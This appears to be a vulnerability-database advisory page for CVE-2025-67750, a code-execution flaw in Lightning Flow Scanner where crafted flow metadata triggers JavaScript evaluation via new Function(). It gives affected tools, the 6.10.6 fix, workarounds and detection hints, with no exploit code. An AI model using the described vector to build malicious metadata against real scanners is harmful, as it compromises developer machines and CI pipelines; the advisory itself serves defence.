CVE-2025-67750
📋 TL;DR
CVE-2025-67750 is a remote code execution vulnerability in Lightning Flow Scanner where maliciously crafted flow metadata files can execute arbitrary JavaScript during scanning. The vulnerability affects developers using the CLI plugin, VS Code Extension, or GitHub Action versions 6.10.5 and below, potentially compromising developer machines, CI runners, or editor environments.
💻 Affected Systems
- Lightning Flow Scanner CLI plugin
- Lightning Flow Scanner VS Code Extension
- Lightning Flow Scanner GitHub Action
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of developer workstations or CI/CD infrastructure leading to data theft, lateral movement, and supply chain attacks.
Likely Case
Malicious code execution on developer machines scanning untrusted flow metadata, potentially stealing credentials or sensitive data.
If Mitigated
Limited impact if scanning only trusted metadata sources with proper network segmentation and least privilege.
🎯 Exploit Status
Exploitation requires the victim to scan a malicious flow metadata file, which could be delivered via repositories, shared files, or CI/CD pipelines.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.10.6
Vendor Advisory: https://github.com/Flow-Scanner/lightning-flow-scanner/security/advisories/GHSA-55jh-84jv-8mx8
Restart Required: No
Instructions:
1. Update Lightning Flow Scanner to version 6.10.6 or higher. 2. For CLI: npm update @flowscanner/cli. 3. For VS Code: Update extension via marketplace. 4. For GitHub Action: Update workflow to use core-v6.10.6 or later.
🔧 Temporary Workarounds
Disable APIVersion rule
allTemporarily disable the vulnerable rule that uses new Function() evaluation
Add 'APIVersion' to disabledRules in scanner configuration
Scan only trusted sources
allRestrict scanning to verified, trusted flow metadata files
🧯 If You Can't Patch
- Isolate scanning environments with network segmentation and minimal privileges
- Implement strict source control policies to prevent untrusted flow metadata
🔍 How to Verify
Check if Vulnerable:
Check current version: For CLI run 'flow-scanner --version', for VS Code check extension version, for GitHub Action check workflow YAML.Check Version:
flow-scanner --versionVerify Fix Applied:
Confirm version is 6.10.6 or higher using the same commands.📡 Detection & Monitoring
Log Indicators:
- Unexpected JavaScript execution errors in scanner logs
- Unusual process creation during flow scanning
Network Indicators:
- Unexpected outbound connections from scanning environments
SIEM Query:
Process creation where parent process contains 'flow-scanner' AND command line contains suspicious JavaScript patterns